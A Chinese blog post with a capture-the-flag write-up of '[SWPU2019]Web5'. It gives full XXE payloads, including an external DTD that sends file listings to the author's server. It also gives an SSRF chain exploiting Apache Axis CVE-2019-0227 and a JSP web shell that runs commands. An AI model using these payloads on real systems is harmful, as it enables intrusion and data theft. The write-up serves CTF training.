[SWPU2019]Web5

最新推荐文章于 2022-11-01 19:26:14 发布
最新推荐文章于 2022-11-01 19:26:14 发布
阅读量625 收藏 1
点赞数
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/122692854
版权

[SWPU2019]Web5

题目给了个导入导出通讯录的功能,导出为xlsx文件,所以猜测是解析excel引起的xxe

验证一下

对[Content_Types].xml写入poc之后再压缩回去

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANYTHING [
<!ENTITY % test SYSTEM "http://124.70.40.5:1234">
%test;

1643111589126.png

验证了xxe存在.无法直接读flag,利用java的file协议列目录,没回显的xxe。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % fmyyy SYSTEM "http://124.70.40.5/evil.dtd">
%fmyyy;
]>

evil.dtd内容

<!ENTITY % file SYSTEM "file:ctffffff/backups">
<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://124.70.40.5:1234/?%file;'> ">
%dtd;
%xxe;

1643114264023.png

看到备份目录,下载。/ctffffff/backups/backup-af7f385c8840f173779124df915b6ebb.zip

1643116574890.png

读web.xml看到注册了FlagServlet,但没有权限读/flag

1643116937583.png

1643116984648.png

看到axis,查看其版本信息

1643116611282.png

该版本正好有个RCE

CVE-2019-0227

https://paper.seebug.org/1489/#141-rceservicehandler

这里的post请求包无法打通,因为这洞有前提条件,但xxe可以进行ssrf,尝试get的请求,用文章里第一个就行,路径得改成axis/shell.jsp

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % fmyyy SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">
%fmyyy;
]>

1643118531514.png

访问看见服务成功开启

然后post /axis/services/randomBBB(这里路径对应上面开启的服务名)

POST /axis/services/randomBBB HTTP/1.1
Host: 19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SOAPAction: something
Content-Length: 874
Origin: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
Connection: close
Referer: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81/axis/services/AdminService
Cookie: __gads=ID=df4db7075da356b3-22a4b6a235c800b4:T=1620812094:RT=1620812094:S=ALNI_MbStkXgvBJ8Ws8Umu-eWCgWwB0rTw; UM_distinctid=17cb52e2bac47c-0b11a0162b7f1d-455e6d-1fa400-17cb52e2bad4d8
Upgrade-Insecure-Requests: 1

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>

1643119208454.png

fmyyy1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CellWeb5.cab
09-23
用友华表的Cell cab包,用于报表制作,或样式打印
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
web5-HTTP/HTTPS
growing_duck的博客
11-01 1220
http 和 https解析
[SWPU2019]Web1
plant1234的博客
04-15 620
[SWPU2019]Web1 首先打开题目发现是一个登陆界面,尝试sql注入没有效果 发现可以注册就随便注册一个用户登陆 发现有一个广告申请发布 对这个广告申请发布进行各种注入攻击,发现有sql注入 点击广告详情发现sql语句报错: 就住它进行注入发现有过滤: 然后测试发现:过滤了空格,or,and,注释,updatexml,extractvalue 所以我们采用union注入,空格用/**/代替,注释采取单引号闭合 因为过滤了or 所有我们采用: 1'/**/group/**/by/**/1,'1
SWPUCTF2019web题复现
bmth666的博客
04-05 1162
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
[SWPU2019]Web1 1
shinygod的博客
03-23 3054
知识点:sql联合注入(各种关键词的替换) 我们先注册,尝试以admin为用户名 提示已被注册,说明存在admin用户,但密码我没有爆破成功,还是老老实实的注册吧。(如果各位大佬成功了,望留言!!) 注册个账号,进入里面唯一能够输入的就是广告位 有报错,且会过滤一些关键词,例如and,order by…空格也被过滤了。 空格我们可以用/**/来代替,order by可以用group by来代替,注释符可以用’来闭合。 当我们查列名23会报错 -1'/**/group/**/by/**/23,'ab
BUUCTF: [SWPU2019]Web1
末初的CSDN博客
09-25 658
登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如。但是因为没有字段信息可以查,使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入,尝试在广告名处输入单引号。,发布的时候并没有任何反应,发布后有个。尝试联合查询、首先需要判断有多少字段,直接报错了,基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明,因为这里过滤。
[SWPU2019]Web3
snowlyzz的博客
09-02 313
一题三考点
[SWPU2019]Web1wp
m0_55185160的博客
04-17 2657
我们用sql的惯用姿势1’ or 1=1#去试显示登录失败,也不是get方式传参,还有下面的注册,觉得这里不存在sql注入,注册后发现用户名叫admin已经被注册过了,也发现这里应该不存在注入,随便注册一个账号,登录看这个网站有什么功能。 发现可能在广告申请处有可能存在sql注入, 这里存在waf,于是fuzz测试一下,但是在测试时发现广告申请条数存在限制,必须要清空广告申请列表才可以写下一个申请,所以只能手动测试 我们发现有or # and --+被过滤了 我们发现..
[SWPU2019]Web4
shinygod的博客
09-17 648
知识点:16进制+mysql预处理,在PDO环境下的sql进行堆叠注入、mvc框架的简单审计、extract函数变量覆盖
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
仅作备份
swpu前端实验4的实验
04-23
swpu
swpu考试系统
07-01
swpu考试系统,内部的系统
BUUCTF [SWPU2019] Web3
Senimo
12-20 788
BUUCTF [SWPU2019] Web3 考点: 启动环境: 首先是一个登陆页面,标题为:CTF-Flask-Demo,推测其应为Flask所编写,尝试使用admin用户登陆: 用户名:admin、密码:admin,登陆成功: 又尝试了几个登陆密码,应该是没有验证,随便登陆 其中有文件上传功能,点击upload: 提示权限不足,考虑其为session判断权限,使用BurpSuite查看页面Cookie信息: 注:在Flask中,session是保存在Cookie中,也就是本地,所以可以直接读取其内
毕业设计MATLAB_执行一维相同大小矩阵的QR分解.zip
05-27
毕业设计matlab
ipython-7.9.0.tar.gz
最新发布
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
debugpy-1.0.0b3-cp37-cp37m-manylinux2010_x86_64.whl
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值